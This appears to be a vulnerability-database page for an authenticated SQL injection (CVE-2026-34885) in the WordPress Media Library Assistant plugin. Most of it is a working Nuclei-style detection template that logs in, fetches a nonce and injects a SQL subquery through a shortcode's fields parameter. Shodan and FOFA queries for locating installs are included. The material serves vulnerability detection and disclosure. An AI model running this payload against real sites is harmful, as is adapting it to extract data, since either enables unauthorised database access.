/Vulnerability Library

WordPress Media Library Assistant <= 3.34 - SQL Injection

CVE-2026-34885
Verified

Description

David Lingren Media Library Assistant <= 3.34 contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.

Severity

High

CVSS Score

8.5

Exploit Probability

6%

Published Date

April 8, 2026

Template Author

theamanrawat

CVE-2026-34885.yaml
id: CVE-2026-34885

info:
  name: WordPress Media Library Assistant <= 3.34 - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    David Lingren Media Library Assistant <= 3.34 contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, modification, or deletion.
  remediation: |
    Update to the latest version beyond 3.34.
  reference:
    - https://patchstack.com/database/vulnerability/wordpress-media-library-assistant-plugin-3-34-sql-injection-vulnerability
    - https://plugins.svn.wordpress.org/media-library-assistant/tags/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-34885
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 8.5
    cve-id: CVE-2026-34885
    epss-score: 0.06103
    epss-percentile: 0.90873
    cwe-id: CWE-89
  metadata:
    max-request: 5
    verified: true
    shodan-query: http.html:"/wp-content/plugins/media-library-assistant/"
    fofa-query: body="/wp-content/plugins/media-library-assistant/"
  tags: cve,cve2026,wp,wordpress,wp-plugin,sqli,media-library-assistant,authenticated

variables:
  num: "999999999"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt"

    matchers:
      - type: word
        words:
          - "Media Library Assistant"
          - "Stable tag:"
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=rest-nonce HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 0
        regex:
          - "^[a-f0-9]{10}$"
        internal: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-json/wp/v2/posts HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-WP-Nonce: {{nonce}}

        {"title":"{{rand_text_alpha(10)}}","content":"[mla_custom_list meta_key=\"_wp_attached_file\" fields=\"(SELECT CONCAT(0x7170787871,md5({{num}}),0x7171787171)) AS meta_value\" no_count=\"true\"]","status":"draft"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 201'
          - 'contains_all(body, "{{md5(num)}}", "content", "rendered")'
        condition: and
# digest: 4b0a00483046022100a5dd1f6d7d5155061f311068975e976dc27ee76fa88ce2469a8851fd5782fa6302210093d2b5e89eb8a46c5f43cbb6ca77da5056c0ca02f06cf13c751c21d2614230e3:922c64590222798bb761d5b6d8e72950
8.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L
CVE ID:
cve-2026-34885
CWE ID:
cwe-89

References

https://patchstack.com/database/vulnerability/wordpress-media-library-assistant-plugin-3-34-sql-injection-vulnerabilityhttps://plugins.svn.wordpress.org/media-library-assistant/tags/https://nvd.nist.gov/vuln/detail/CVE-2026-34885

Remediation Steps

Update to the latest version beyond 3.34.